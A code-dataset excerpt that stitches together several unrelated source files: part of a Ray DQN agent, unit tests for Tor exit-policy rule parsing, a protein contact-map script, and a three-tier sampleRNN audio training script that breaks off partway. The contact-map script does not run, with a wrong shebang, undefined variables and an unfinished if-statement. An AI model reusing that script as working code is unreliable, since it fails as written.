obs, action, rew, new_obs, done = self.step(cur_timestep)
self.replay_buffer.add(obs, action, rew, new_obs, done)
def get_gradient(self, cur_timestep):
if self.config["prioritized_replay"]:
experience = self.replay_buffer.sample(
self.config["train_batch_size"],
beta=self.beta_schedule.value(cur_timestep))
(obses_t, actions, rewards, obses_tp1,
dones, _, batch_idxes) = experience
else:
obses_t, actions, rewards, obses_tp1, dones = \
self.replay_buffer.sample(self.config["train_batch_size"])
batch_idxes = None
td_errors, grad = self.dqn_graph.compute_gradients(
self.sess, obses_t, actions, rewards, obses_tp1, dones,
np.ones_like(rewards))
if self.config["prioritized_replay"]:
new_priorities = (
np.abs(td_errors) + self.config["prioritized_replay_eps"])
self.replay_buffer.update_priorities(
batch_idxes, new_priorities)
return grad
def apply_gradients(self, grad):
self.dqn_graph.apply_gradients(self.sess, grad)
def stats(self, num_timesteps):
mean_100ep_reward = round(np.mean(self.episode_rewards[-101:-1]), 1)
mean_100ep_length = round(np.mean(self.episode_lengths[-101:-1]), 1)
exploration = self.exploration.value(num_timesteps)
return (
mean_100ep_reward,
mean_100ep_length,
len(self.episode_rewards),
exploration,
len(self.replay_buffer))
def get_weights(self):
return self.variables.get_weights()
def set_weights(self, weights):
self.variables.set_weights(weights)
def save(self):
return [
self.beta_schedule,
self.exploration,
self.episode_rewards,
self.episode_lengths,
self.saved_mean_reward,
self.obs,
self.replay_buffer]
def restore(self, data):
self.beta_schedule = data[0]
self.exploration = data[1]
self.episode_rewards = data[2]
self.episode_lengths = data[3]
self.saved_mean_reward = data[4]
self.obs = data[5]
self.replay_buffer = data[6]
@ray.remote
class RemoteActor(Actor):
def __init__(self, env_creator, config, logdir, gpu_mask):
os.environ["CUDA_VISIBLE_DEVICES"] = gpu_mask
Actor.__init__(self, env_creator, config, logdir)
class DQNAgent(Agent):
_agent_name = "DQN"
_default_config = DEFAULT_CONFIG
def _init(self):
self.actor = Actor(self.env_creator, self.config, self.logdir)
self.workers = [
RemoteActor.remote(
self.env_creator, self.config, self.logdir,
"{}".format(i + self.config["gpu_offset"]))
for i in range(self.config["num_workers"])]
self.cur_timestep = 0
self.num_iterations = 0
self.num_target_updates = 0
self.steps_since_update = 0
self.file_writer = tf.summary.FileWriter(
self.logdir, self.actor.sess.graph)
self.saver = tf.train.Saver(max_to_keep=None)
def _update_worker_weights(self):
w = self.actor.get_weights()
weights = ray.put(self.actor.get_weights())
for w in self.workers:
w.set_weights.remote(weights)
def _train(self):
config = self.config
sample_time, sync_time, learn_time, apply_time = 0, 0, 0, 0
iter_init_timesteps = self.cur_timestep
num_loop_iters = 0
steps_per_iter = config["sample_batch_size"] * len(self.workers)
while (self.cur_timestep - iter_init_timesteps <
config["timesteps_per_iteration"]):
dt = time.time()
ray.get([
w.do_steps.remote(
config["sample_batch_size"], self.cur_timestep)
for w in self.workers])
num_loop_iters += 1
self.cur_timestep += steps_per_iter
self.steps_since_update += steps_per_iter
sample_time += time.time() - dt
if self.cur_timestep > config["learning_starts"]:
dt = time.time()
# Minimize the error in Bellman's equation on a batch sampled
# from replay buffer.
self._update_worker_weights()
sync_time += (time.time() - dt)
dt = time.time()
gradients = ray.get(
[w.get_gradient.remote(self.cur_timestep)
for w in self.workers])
learn_time += (time.time() - dt)
dt = time.time()
for grad in gradients:
self.actor.apply_gradients(grad)
apply_time += (time.time() - dt)
if (self.cur_timestep > config["learning_starts"] and
self.steps_since_update >
config["target_network_update_freq"]):
self.actor.dqn_graph.update_target(self.actor.sess)
# Update target network periodically.
self._update_worker_weights()
self.steps_since_update -= config["target_network_update_freq"]
self.num_target_updates += 1
mean_100ep_reward = 0.0
mean_100ep_length = 0.0
num_episodes = 0
buffer_size_sum = 0
for mean_rew, mean_len, episodes, exploration, buf_sz in ray.get(
[w.stats.remote(self.cur_timestep) for w in self.workers]):
mean_100ep_reward += mean_rew
mean_100ep_length += mean_len
num_episodes += episodes
buffer_size_sum += buf_sz
mean_100ep_reward /= len(self.workers)
mean_100ep_length /= len(self.workers)
info = [
("mean_100ep_reward", mean_100ep_reward),
("exploration_frac", exploration),
("steps", self.cur_timestep),
("episodes", num_episodes),
("buffer_sizes_sum", buffer_size_sum),
("target_updates", self.num_target_updates),
("sample_time", sample_time),
("weight_sync_time", sync_time),
("apply_time", apply_time),
("learn_time", learn_time),
("samples_per_s",
num_loop_iters * np.float64(steps_per_iter) / sample_time),
("learn_samples_per_s",
num_loop_iters * np.float64(config["train_batch_size"]) *
np.float64(config["num_workers"]) / learn_time),
]
for k, v in info:
logger.record_tabular(k, v)
logger.dump_tabular()
result = TrainingResult(
episode_reward_mean=mean_100ep_reward,
episode_len_mean=mean_100ep_length,
timesteps_this_iter=self.cur_timestep - iter_init_timesteps,
info=info)
return result
def _save(self):
checkpoint_path = self.saver.save(
self.actor.sess,
os.path.join(self.logdir, "checkpoint"),
global_step=self.num_iterations)
extra_data = [
self.actor.save(),
ray.get([w.save.remote() for w in self.workers]),
self.cur_timestep,
self.num_iterations,
self.num_target_updates,
self.steps_since_update]
pickle.dump(extra_data, open(checkpoint_path + ".extra_data", "wb"))
return checkpoint_path
def _restore(self, checkpoint_path):
self.saver.restore(self.actor.sess, checkpoint_path)
extra_data = pickle.load(open(checkpoint_path + ".extra_data", "rb"))
self.actor.restore(extra_data[0])
ray.get([
w.restore.remote(d) for (d, w)
in zip(extra_data[1], self.workers)])
self.cur_timestep = extra_data[2]
self.num_iterations = extra_data[3]
self.num_target_updates = extra_data[4]
self.steps_since_update = extra_data[5]
def compute_action(self, observation):
return self.actor.dqn_graph.act(
self.actor.sess, np.array(observation)[None], 0.0)[0]
| apache-2.0 | -416,873,251,771,667,650 | 36.423377 | 79 | 0.595364 | false |
eoinof/stem | test/unit/exit_policy/rule.py | 1 | 10901 | """
Unit tests for the stem.exit_policy.ExitPolicyRule class.
"""
import unittest
from stem.exit_policy import AddressType, ExitPolicyRule
class TestExitPolicyRule(unittest.TestCase):
def test_accept_or_reject(self):
self.assertTrue(ExitPolicyRule("accept *:*").is_accept)
self.assertFalse(ExitPolicyRule("reject *:*").is_accept)
invalid_inputs = (
"accept",
"reject",
"accept *:*",
"accept\t*:*",
"accept\n*:*",
"acceptt *:*",
"rejectt *:*",
"blarg *:*",
" *:*",
"*:*",
"",
)
for rule_arg in invalid_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_str_unchanged(self):
# provides a series of test inputs where the str() representation should
# match the input rule
test_inputs = (
"accept *:*",
"reject *:*",
"accept *:80",
"accept *:80-443",
"accept 127.0.0.1:80",
"accept 87.0.0.1/24:80",
"accept 156.5.38.3/255.255.0.255:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]:80",
"accept [FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF]/32:80",
)
for rule_arg in test_inputs:
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(rule_arg, str(rule))
def test_str_changed(self):
# some instances where our rule is valid but won't match our str() representation
test_inputs = {
"accept 10.0.0.1/32:80": "accept 10.0.0.1:80",
"accept 192.168.0.1/255.255.255.0:80": "accept 192.168.0.1/24:80",
"accept [::]/32:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]/32:*",
"accept [::]/128:*": "accept [0000:0000:0000:0000:0000:0000:0000:0000]:*",
}
for rule_arg, expected_str in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
self.assertEquals(rule_arg, rule.rule)
self.assertEquals(expected_str, str(rule))
def test_valid_wildcard(self):
test_inputs = {
"reject *:*": (True, True),
"reject *:80": (True, False),
"accept 192.168.0.1:*": (False, True),
"accept 192.168.0.1:80": (False, False),
"reject 127.0.0.1/0:*": (False, True),
"reject 127.0.0.1/16:*": (False, True),
"reject 127.0.0.1/32:*": (False, True),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/0:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/64:80": (False, False),
"reject [0000:0000:0000:0000:0000:0000:0000:0000]/128:80": (False, False),
"accept 192.168.0.1:0-65535": (False, True),
"accept 192.168.0.1:1-65535": (False, True),
"accept 192.168.0.1:2-65535": (False, False),
"accept 192.168.0.1:1-65534": (False, False),
}
for rule_arg, attr in test_inputs.items():
is_address_wildcard, is_port_wildcard = attr
rule = ExitPolicyRule(rule_arg)
self.assertEquals(is_address_wildcard, rule.is_address_wildcard())
self.assertEquals(is_port_wildcard, rule.is_port_wildcard())
def test_invalid_wildcard(self):
test_inputs = (
"reject */16:*",
"reject 127.0.0.1/*:*",
"reject *:0-*",
"reject *:*-15",
)
for rule_arg in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, rule_arg)
def test_wildcard_attributes(self):
rule = ExitPolicyRule("reject *:*")
self.assertEquals(AddressType.WILDCARD, rule.address_type)
self.assertEquals(None, rule.address)
self.assertEquals(None, rule.mask)
self.assertEquals(None, rule.masked_bits)
self.assertEquals(1, rule.min_port)
self.assertEquals(65535, rule.max_port)
def test_valid_ipv4_addresses(self):
test_inputs = {
"0.0.0.0": ("0.0.0.0", "255.255.255.255", 32),
"127.0.0.1/32": ("127.0.0.1", "255.255.255.255", 32),
"192.168.0.50/24": ("192.168.0.50", "255.255.255.0", 24),
"255.255.255.255/0": ("255.255.255.255", "0.0.0.0", 0),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv4, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv4_addresses(self):
test_inputs = (
"256.0.0.0",
"-1.0.0.0",
"0.0.0",
"0.0.0.",
"0.0.0.a",
"127.0.0.1/-1",
"127.0.0.1/33",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ipv6_addresses(self):
test_inputs = {
"[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[FE80::0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[0000:0000:0000:0000:0000:0000:0000:0000]/0":
("0000:0000:0000:0000:0000:0000:0000:0000",
"0000:0000:0000:0000:0000:0000:0000:0000", 0),
"[::]":
("0000:0000:0000:0000:0000:0000:0000:0000",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv6, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv6_addresses(self):
test_inputs = (
"fe80::0202:b3ff:fe1e:8329",
"[fe80::0202:b3ff:fe1e:8329",
"fe80::0202:b3ff:fe1e:8329]",
"[fe80::0202:b3ff:fe1e:832g]",
"[fe80:::b3ff:fe1e:8329]",
"[fe80::b3ff::fe1e:8329]",
"[fe80::0202:b3ff:fe1e:8329]/-1",
"[fe80::0202:b3ff:fe1e:8329]/129",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ports(self):
test_inputs = {
"0": (0, 0),
"1": (1, 1),
"80": (80, 80),
"80-443": (80, 443),
}
for rule_port, attr in test_inputs.items():
min_port, max_port = attr
rule = ExitPolicyRule("accept 127.0.0.1:%s" % rule_port)
self.assertEquals(min_port, rule.min_port)
self.assertEquals(max_port, rule.max_port)
def test_invalid_ports(self):
test_inputs = (
"65536",
"a",
"5-3",
"5-",
"-3",
)
for rule_port in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept 127.0.0.1:%s" % rule_port)
def test_is_match_wildcard(self):
test_inputs = {
"reject *:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("192.168.0.1", None): True,
(None, 80): True,
(None, None): True,
},
"reject 255.255.255.255/0:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): False,
("192.168.0.1", None): True,
(None, 80): False,
(None, None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
# port zero is special in that exit policies can include it, but it's not
# something that we can match against
rule = ExitPolicyRule("reject *:*")
self.assertRaises(ValueError, rule.is_match, "127.0.0.1", 0)
def test_is_match_ipv4(self):
test_inputs = {
"reject 192.168.0.50:*": {
("192.168.0.50", 80): True,
("192.168.0.51", 80): False,
("192.168.0.49", 80): False,
(None, 80): False,
("192.168.0.50", None): True,
},
"reject 0.0.0.0/24:*": {
("0.0.0.0", 80): True,
("0.0.0.1", 80): True,
("0.0.0.255", 80): True,
("0.0.1.0", 80): False,
("0.1.0.0", 80): False,
("1.0.0.0", 80): False,
(None, 80): False,
("0.0.0.0", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_ipv6(self):
test_inputs = {
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("fe80:0000:0000:0000:0202:b3ff:fe1e:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8330", 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8328", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]/112:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:0000", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:FFFF", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1F:8329", 80): False,
("FE81:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_port(self):
test_inputs = {
"reject *:80": {
("192.168.0.50", 80): True,
("192.168.0.50", 81): False,
("192.168.0.50", 79): False,
(None, 80): True,
("192.168.0.50", None): False,
},
"reject *:80-85": {
("192.168.0.50", 79): False,
("192.168.0.50", 80): True,
("192.168.0.50", 83): True,
("192.168.0.50", 85): True,
("192.168.0.50", 86): False,
(None, 83): True,
("192.168.0.50", None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
| lgpl-3.0 | 8,623,108,772,148,325,000 | 32.336391 | 86 | 0.566278 | false |
mskwark/PconsC3 | extra/arne/MSA/find-intradom.py | 1 | 1381 | #!/usr/bin/env perl
# Find all contacts beween domains..
import sys, os, re, string
import argparse
from os.path import expanduser
home = expanduser("~")
sys.path.append(home + '/bioinfo-toolbox/parsing')
sys.path.append(home + '/git/bioinfo-toolbox/parsing')
import parse_contacts
import numpy as np
import matplotlib
matplotlib.use('Agg')
sep=5
contacts = parse_contacts.parse(open(c_filename, 'r'), sep)
contacts_np = parse_contacts.get_numpy_cmap(contacts)
contacts_np = contacts_np[start:end,start:end]
for i in range(len(contacts)):
score = contacts[i][0]
c_x = contacts[i][1] - 1
c_y = contacts[i][2] - 1
# only look at contacts within given range
# default: take full sequence range into account
if c_x < start or c_x >= end:
continue
if c_y < start or c_y >= end:
continue
if c_y-c_x < start or c_y >= end:
continue
if c_x < domain
pos_diff = abs(c_x - c_y)
too_close = pos_diff < 5
if __name__ == "__main__":
p = argparse.ArgumentParser(description='Plot protein residue contact maps.')
p.add_argument('-t', '--threshold', default=-1, type=float)
p.add_argument('--start', default=0, type=int)
p.add_argument('--end', default=-1, type=int)
p.add_argument('--sep', default=5, type=int)
p.add_argument('--domain', default=-1, type=int)
| gpl-2.0 | -7,908,435,588,187,494,000 | 26.078431 | 81 | 0.631427 | false |
soroushmehr/sampleRNN_ICLR2017 | models/three_tier/three_tier.py | 1 | 35718 | """
RNN Audio Generation Model
Three-tier model, Quantized input
For more info:
$ python three_tier.py -h
How-to-run example:
sampleRNN$ pwd
/u/mehris/sampleRNN
sampleRNN$ \
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python -u \
models/three_tier/three_tier.py --exp AXIS1 --seq_len 512 --big_frame_size 8 \
--frame_size 2 --weight_norm True --emb_size 64 --skip_conn False --dim 32 \
--n_rnn 2 --rnn_type LSTM --learn_h0 False --q_levels 16 --q_type linear \
--batch_size 128 --which_set MUSIC
To resume add ` --resume` to the END of the EXACTLY above line. You can run the
resume code as many time as possible, depending on the TRAIN_MODE.
(folder name, file name, flags, their order, and the values are important)
"""
from time import time
from datetime import datetime
print "Experiment started at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
exp_start = time()
import os, sys, glob
sys.path.insert(1, os.getcwd())
import argparse
import itertools
import numpy
numpy.random.seed(123)
np = numpy
import random
random.seed(123)
import theano
import theano.tensor as T
import theano.ifelse
import lasagne
import scipy.io.wavfile
import lib
LEARNING_RATE = 0.001
### Parsing passed args/hyperparameters ###
def get_args():
def t_or_f(arg):
ua = str(arg).upper()
if 'TRUE'.startswith(ua):
return True
elif 'FALSE'.startswith(ua):
return False
else:
raise ValueError('Arg is neither `True` nor `False`')
def check_non_negative(value):
ivalue = int(value)
if ivalue < 0:
raise argparse.ArgumentTypeError("%s is not non-negative!" % value)
return ivalue
def check_positive(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("%s is not positive!" % value)
return ivalue
def check_unit_interval(value):
fvalue = float(value)
if fvalue < 0 or fvalue > 1:
raise argparse.ArgumentTypeError("%s is not in [0, 1] interval!" % value)
return fvalue
# No default value here. Indicate every single arguement.
parser = argparse.ArgumentParser(
description='three_tier.py\nNo default value! Indicate every argument.')
# TODO: Fix the descriptions
# Hyperparameter arguements:
parser.add_argument('--exp', help='Experiment name',
type=str, required=False, default='_')
parser.add_argument('--seq_len', help='How many samples to include in each\
Truncated BPTT pass', type=check_positive, required=True)
parser.add_argument('--big_frame_size', help='How many samples per big frame',\
type=check_positive, required=True)
parser.add_argument('--frame_size', help='How many samples per frame',\
type=check_positive, required=True)
parser.add_argument('--weight_norm', help='Adding learnable weight normalization\
to all the linear layers (except for the embedding layer)',\
type=t_or_f, required=True)
parser.add_argument('--emb_size', help='Size of embedding layer (> 0)',
type=check_positive, required=True) # different than two_tier
parser.add_argument('--skip_conn', help='Add skip connections to RNN',
type=t_or_f, required=True)
parser.add_argument('--dim', help='Dimension of RNN and MLPs',\
type=check_positive, required=True)
parser.add_argument('--n_rnn', help='Number of layers in the stacked RNN',
type=check_positive, choices=xrange(1,6), required=True)
parser.add_argument('--rnn_type', help='GRU or LSTM', choices=['LSTM', 'GRU'],\
required=True)
parser.add_argument('--learn_h0', help='Whether to learn the initial state of RNN',\
type=t_or_f, required=True)
parser.add_argument('--q_levels', help='Number of bins for quantization of\
audio samples. Should be 256 for mu-law.',\
type=check_positive, required=True)
parser.add_argument('--q_type', help='Quantization in linear-scale, a-law-companding,\
or mu-law compandig. With mu-/a-law quantization level shoud be set as 256',\
choices=['linear', 'a-law', 'mu-law'], required=True)
parser.add_argument('--which_set', help='ONOM, BLIZZ, MUSIC, or HUCK',
choices=['ONOM', 'BLIZZ', 'MUSIC', 'HUCK'], required=True)
parser.add_argument('--batch_size', help='size of mini-batch',
type=check_positive, choices=[64, 128, 256], required=True)
parser.add_argument('--debug', help='Debug mode', required=False, default=False, action='store_true')
parser.add_argument('--resume', help='Resume the same model from the last\
checkpoint. Order of params are important. [for now]',\
required=False, default=False, action='store_true')
args = parser.parse_args()
# NEW
# Create tag for this experiment based on passed args
tag = reduce(lambda a, b: a+b, sys.argv).replace('--resume', '').replace('/', '-').replace('--', '-').replace('True', 'T').replace('False', 'F')
tag += '-lr'+str(LEARNING_RATE)
print "Created experiment tag for these args:"
print tag
return args, tag
args, tag = get_args()
SEQ_LEN = args.seq_len # How many samples to include in each truncated BPTT pass
#print "------------------previous SEQ_LEN:", SEQ_LEN
# TODO: test incremental training
#SEQ_LEN = 512 + 256
#print "---------------------------new SEQ_LEN:", SEQ_LEN
BIG_FRAME_SIZE = args.big_frame_size # how many samples per big frame
FRAME_SIZE = args.frame_size # How many samples per frame
OVERLAP = BIG_FRAME_SIZE
WEIGHT_NORM = args.weight_norm
EMB_SIZE = args.emb_size
SKIP_CONN = args.skip_conn
DIM = args.dim # Model dimensionality.
BIG_DIM = DIM # Dimensionality for the slowest level.
N_RNN = args.n_rnn # How many RNNs to stack in the frame-level model
N_BIG_RNN = N_RNN # how many RNNs to stack in the big-frame-level model
RNN_TYPE = args.rnn_type
H0_MULT = 2 if RNN_TYPE == 'LSTM' else 1
LEARN_H0 = args.learn_h0
Q_LEVELS = args.q_levels # How many levels to use when discretizing samples. e.g. 256 = 8-bit scalar quantization
Q_TYPE = args.q_type # log- or linear-scale
WHICH_SET = args.which_set
BATCH_SIZE = args.batch_size
RESUME = args.resume
assert SEQ_LEN % BIG_FRAME_SIZE == 0,\
'seq_len should be divisible by big_frame_size'
assert BIG_FRAME_SIZE % FRAME_SIZE == 0,\
'big_frame_size should be divisible by frame_size'
N_FRAMES = SEQ_LEN / FRAME_SIZE # Number of frames in each truncated BPTT pass
if Q_TYPE == 'mu-law' and Q_LEVELS != 256:
raise ValueError('For mu-law Quantization levels should be exactly 256!')
# Fixed hyperparams
GRAD_CLIP = 1 # Elementwise grad clip threshold
BITRATE = 16000
# Other constants
#TRAIN_MODE = 'iters' # To use PRINT_ITERS and STOP_ITERS
TRAIN_MODE = 'time' # To use PRINT_TIME and STOP_TIME
#TRAIN_MODE = 'time-iters'
# To use PRINT_TIME for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
#TRAIN_MODE = 'iters-time'
# To use PRINT_ITERS for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
PRINT_ITERS = 10000 # Print cost, generate samples, save model checkpoint every N iterations.
STOP_ITERS = 100000 # Stop after this many iterations
PRINT_TIME = 90*60 # Print cost, generate samples, save model checkpoint every N seconds.
STOP_TIME = 60*60*24*3 # Stop after this many seconds of actual training (not including time req'd to generate samples etc.)
N_SEQS = 20 # Number of samples to generate every time monitoring.
RESULTS_DIR = 'results_3t'
FOLDER_PREFIX = os.path.join(RESULTS_DIR, tag)
Q_ZERO = numpy.int32(Q_LEVELS//2) # Discrete value correponding to zero amplitude
epoch_str = 'epoch'
iter_str = 'iter'
lowest_valid_str = 'lowest valid cost'
corresp_test_str = 'correponding test cost'
train_nll_str, valid_nll_str, test_nll_str = \
'train NLL (bits)', 'valid NLL (bits)', 'test NLL (bits)'
if args.debug:
import warnings
warnings.warn('----------RUNNING IN DEBUG MODE----------')
TRAIN_MODE = 'time'
PRINT_TIME = 100
STOP_TIME = 3000
STOP_ITERS = 1000
### Create directories ###
# FOLDER_PREFIX: root, contains:
# log.txt, __note.txt, train_log.pkl, train_log.png [, model_settings.txt]
# FOLDER_PREFIX/params: saves all checkpoint params as pkl
# FOLDER_PREFIX/samples: keeps all checkpoint samples as wav
# FOLDER_PREFIX/best: keeps the best parameters, samples, ...
if not os.path.exists(FOLDER_PREFIX):
os.makedirs(FOLDER_PREFIX)
PARAMS_PATH = os.path.join(FOLDER_PREFIX, 'params')
if not os.path.exists(PARAMS_PATH):
os.makedirs(PARAMS_PATH)
SAMPLES_PATH = os.path.join(FOLDER_PREFIX, 'samples')
if not os.path.exists(SAMPLES_PATH):
os.makedirs(SAMPLES_PATH)
BEST_PATH = os.path.join(FOLDER_PREFIX, 'best')
if not os.path.exists(BEST_PATH):
os.makedirs(BEST_PATH)
lib.print_model_settings(locals(), path=FOLDER_PREFIX, sys_arg=True)
### Import the data_feeder ###
# Handling WHICH_SET
if WHICH_SET == 'ONOM':
from datasets.dataset import onom_train_feed_epoch as train_feeder
from datasets.dataset import onom_valid_feed_epoch as valid_feeder
from datasets.dataset import onom_test_feed_epoch as test_feeder
elif WHICH_SET == 'BLIZZ':
from datasets.dataset import blizz_train_feed_epoch as train_feeder
from datasets.dataset import blizz_valid_feed_epoch as valid_feeder
from datasets.dataset import blizz_test_feed_epoch as test_feeder
elif WHICH_SET == 'MUSIC':
from datasets.dataset import music_train_feed_epoch as train_feeder
from datasets.dataset import music_valid_feed_epoch as valid_feeder
from datasets.dataset import music_test_feed_epoch as test_feeder
elif WHICH_SET == 'HUCK':
from datasets.dataset import huck_train_feed_epoch as train_feeder
from datasets.dataset import huck_valid_feed_epoch as valid_feeder
from datasets.dataset import huck_test_feed_epoch as test_feeder
def load_data(data_feeder):
"""
Helper function to deal with interface of different datasets.
`data_feeder` should be `train_feeder`, `valid_feeder`, or `test_feeder`.
"""
return data_feeder(BATCH_SIZE,
SEQ_LEN,
OVERLAP,
Q_LEVELS,
Q_ZERO,
Q_TYPE)
### Creating computation graph ###
def big_frame_level_rnn(input_sequences, h0, reset):
"""
input_sequences.shape: (batch size, n big frames * BIG_FRAME_SIZE)
h0.shape: (batch size, N_BIG_RNN, BIG_DIM)
reset.shape: ()
output[0].shape: (batch size, n frames, DIM)
output[1].shape: same as h0.shape
output[2].shape: (batch size, seq len, Q_LEVELS)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // BIG_FRAME_SIZE,
BIG_FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
# Initial state of RNNs
learned_h0 = lib.param(
'BigFrameLevel.h0',
numpy.zeros((N_BIG_RNN, H0_MULT*BIG_DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('BigFrameLevel.GRU',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('BigFrameLevel.LSTM',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'BigFrameLevel.Output',
BIG_DIM,
DIM * BIG_FRAME_SIZE / FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * BIG_FRAME_SIZE / FRAME_SIZE, DIM))
independent_preds = lib.ops.Linear(
'BigFrameLevel.IndependentPreds',
BIG_DIM,
Q_LEVELS * BIG_FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
independent_preds = independent_preds.reshape((independent_preds.shape[0], independent_preds.shape[1] * BIG_FRAME_SIZE, Q_LEVELS))
return (output, last_hidden, independent_preds)
def frame_level_rnn(input_sequences, other_input, h0, reset):
"""
input_sequences.shape: (batch size, n frames * FRAME_SIZE)
other_input.shape: (batch size, n frames, DIM)
h0.shape: (batch size, N_RNN, DIM)
reset.shape: ()
output.shape: (batch size, n frames * FRAME_SIZE, DIM)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // FRAME_SIZE,
FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
gru_input = lib.ops.Linear(
'FrameLevel.InputExpand',
FRAME_SIZE,
DIM,
frames,
initialization='he',
weightnorm=WEIGHT_NORM,
) + other_input
# Initial state of RNNs
learned_h0 = lib.param(
'FrameLevel.h0',
numpy.zeros((N_RNN, H0_MULT*DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_RNN, H0_MULT*DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
#learned_h0 = T.patternbroadcast(learned_h0, [False] * learned_h0.ndim)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
